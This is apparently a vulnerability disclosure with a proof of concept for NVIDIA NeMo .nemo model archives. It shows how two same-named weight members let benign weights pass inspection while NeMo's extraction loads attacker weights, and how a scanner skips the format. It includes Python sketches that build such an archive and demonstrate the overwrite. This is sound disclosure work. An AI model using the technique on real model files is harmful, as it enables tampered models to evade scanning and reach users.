NeMo .nemo duplicate archive member: reader differential PoC
Vulnerability class: Model File Vulnerability (MFV), archive member last-write differential
Target: NeMo (NVIDIA)
Tested format: .nemo (TAR archive)
Summary
A .nemo model file is a TAR archive containing model_config.yaml and
model_weights.ckpt. If the archive contains two entries named
model_weights.ckpt, NeMo's restore path extracts all members sequentially
(SaveRestoreConnector._safe_extract), writing each to the same output path.
The last member overwrites the first on disk. A simple archive inspection script
that selects the first matching model_weights.ckpt member observes the benign
checkpoint, while the runtime extraction path uses the later member written to
disk, that is, the attacker-controlled weights.
ModelScan 0.8.8 does not cover the .nemo format and reports SCAN_NOT_SUPPORTED
with 0 issues for both the benign and crafted files.
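As a minimal sketch of the inspection side of this differential, the snippet below builds a small in-memory TAR with two members named model_weights.ckpt and reads it the way a first-match inspector would. The helper names (build_archive, first_match_payload) and the byte payloads are hypothetical stand-ins, not code from reproduce.py or NeMo, and the payloads are plain marker strings rather than real checkpoints.

```python
import io
import tarfile


def build_archive(members):
    """Return TAR bytes containing (name, payload) pairs in the given order."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, payload in members:
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def first_match_payload(archive_bytes, name):
    """Naive inspector: return the payload of the FIRST member with this name."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if member.name == name:
                return tar.extractfile(member).read()
    return None


# Hypothetical stand-in for dup_weights_last.nemo: marker strings, not checkpoints.
crafted = build_archive([
    ("model_config.yaml", b"placeholder: true\n"),
    ("model_weights.ckpt", b"BENIGN"),
    ("model_weights.ckpt", b"MALICIOUS"),
])

with tarfile.open(fileobj=io.BytesIO(crafted), mode="r") as tar:
    names = tar.getnames()

print(names)
print(first_match_payload(crafted, "model_weights.ckpt"))
```

The TAR format itself does not forbid repeated member names, so the archive is well formed, and the first-match reader never sees the second payload.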
Files
| File | Description |
|---|---|
| benign.nemo | Reference model: single model_weights.ckpt entry, identity weights |
| dup_weights_last.nemo | Crafted model: two model_weights.ckpt entries; the first is benign (identity), the second is malicious (99× scale + offset) |
| reproduce.py | Verifies the reader differential and output manipulation |
| requirements.txt | Python dependencies |
Reproduction
pip install -r requirements.txt
python reproduce.py
Expected output
NEMO_TAR_LAST_WRITE_WINS=True
FIRST_MATCH_SEES_BENIGN=True
EXTRACTED_FILE_IS_LAST=True
OUTPUT_FLIP_CONFIRMED=True
first_match output = [1.0, 2.0] (benign, what first-match inspector sees)
nemo_extract output = [198.0, 297.0] (malicious, what sequential extraction writes)
delta = [197.0, 295.0]
MODELSCAN_RESULT=0 issues / SCAN_NOT_SUPPORTED
=== Archive member table (dup_weights_last.nemo) ===
[0] model_config.yaml (38 bytes)
[1] model_weights.ckpt (1829 bytes)
[2] model_weights.ckpt (1829 bytes)
=== Prediction table ===
Model Output
benign.nemo [1.0, 2.0]
dup_weights_last.nemo [198.0, 297.0] <- sequential extract, last wins
[PASS] All checks passed.
Mechanism
In dup_weights_last.nemo, the TAR archive contains two members named
model_weights.ckpt:
- Member [1] (index 0 among weight entries): benign identity weights {bias: [0, 0], scale: [1, 1]}, which produce output [1.0, 2.0] for input [1, 2]
- Member [2] (index 1 among weight entries): malicious 99× weights {bias: [99, 99], scale: [99, 99]}, which produce output [198.0, 297.0] for the same input
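The two outputs listed above are consistent with an elementwise affine map, output = scale * input + bias. That formula is an assumption inferred from the listed numbers, not taken from reproduce.py, and apply_weights is a hypothetical helper. Under that assumption the arithmetic can be checked directly:

```python
def apply_weights(weights, inputs):
    """Elementwise affine map (assumed model form): scale * x + bias."""
    return [
        s * x + b
        for s, b, x in zip(weights["scale"], weights["bias"], inputs)
    ]


benign = {"bias": [0, 0], "scale": [1, 1]}
malicious = {"bias": [99, 99], "scale": [99, 99]}
x = [1.0, 2.0]

benign_out = apply_weights(benign, x)        # [1.0, 2.0]
malicious_out = apply_weights(malicious, x)  # [198.0, 297.0]
delta = [m - b for m, b in zip(malicious_out, benign_out)]  # [197.0, 295.0]

print(benign_out, malicious_out, delta)
```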
NeMo's SaveRestoreConnector._safe_extract iterates tar.getmembers() in archive
order and calls tar.extract(member, out_folder) for each member that passes the
path-safety check. When two members share a name, the second call overwrites the
file written by the first. The model is then loaded from os.path.join(tmpdir, 'model_weights.ckpt'), which now contains the attacker-supplied weights.
Source reference:
nemo/core/connectors/save_restore_connector.py (_safe_extract, _unpack_nemo_file, load_config_and_state_dict)
Permalink: https://github.com/NVIDIA/NeMo/blob/43707ab33d0b1b621dae87454fed9122a7022d28/nemo/core/connectors/save_restore_connector.py
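The overwrite described in this section can be sketched with the standard tarfile module alone. The loop below mirrors the described pattern (iterate getmembers() in archive order, call tar.extract(member, out_folder) for each member) but is not NeMo's code: it omits the path-safety check, and the helper names and marker payloads are hypothetical.

```python
import io
import os
import tarfile
import tempfile


def build_archive(members):
    """Return TAR bytes containing (name, payload) pairs in the given order."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, payload in members:
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def extract_all_in_order(archive_bytes, out_folder):
    """Extract every member in archive order; same-name members overwrite."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r") as tar:
        for member in tar.getmembers():
            # No path-safety check here: this sketch only shows the overwrite.
            tar.extract(member, out_folder)


crafted = build_archive([
    ("model_config.yaml", b"placeholder: true\n"),
    ("model_weights.ckpt", b"BENIGN"),
    ("model_weights.ckpt", b"MALICIOUS"),
])

with tempfile.TemporaryDirectory() as tmpdir:
    extract_all_in_order(crafted, tmpdir)
    extracted_files = sorted(os.listdir(tmpdir))
    with open(os.path.join(tmpdir, "model_weights.ckpt"), "rb") as fh:
        on_disk = fh.read()

print(extracted_files)
print(on_disk)
```

Only one model_weights.ckpt remains on disk after extraction, and it holds the payload of the later member.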
Reader comparison
| Reader | API | Resolution | Weights loaded |
|---|---|---|---|
| First-match archive inspection | getmembers(), then the first model_weights.ckpt entry | first match | identity (benign) |
| NeMo restore path (_safe_extract) | tar.extract() for each member in order | last write wins | 99× scale (malicious) |
| ModelScan 0.8.8 | .scan() | not scanned | 0 issues (SCAN_NOT_SUPPORTED) |
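One way an inspection script could avoid disagreeing with the extraction path is to count member names rather than stop at the first match. The sketch below is an illustration only, not part of this PoC or of any scanner. duplicate_member_names is a hypothetical helper, and normalizing names with posixpath.normpath is an assumption about which names end up at the same output path.

```python
import io
import posixpath
import tarfile
from collections import Counter


def build_archive(members):
    """Return TAR bytes containing (name, payload) pairs in the given order."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, payload in members:
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def duplicate_member_names(archive_bytes):
    """Return normalized member names that occur more than once."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r") as tar:
        # Normalize so that "./x" and "x" count as the same output path.
        counts = Counter(posixpath.normpath(n) for n in tar.getnames())
    return sorted(name for name, count in counts.items() if count > 1)


clean = build_archive([
    ("model_config.yaml", b"placeholder: true\n"),
    ("model_weights.ckpt", b"BENIGN"),
])
crafted = build_archive([
    ("model_config.yaml", b"placeholder: true\n"),
    ("model_weights.ckpt", b"BENIGN"),
    ("./model_weights.ckpt", b"MALICIOUS"),
])

print(duplicate_member_names(clean))
print(duplicate_member_names(crafted))
```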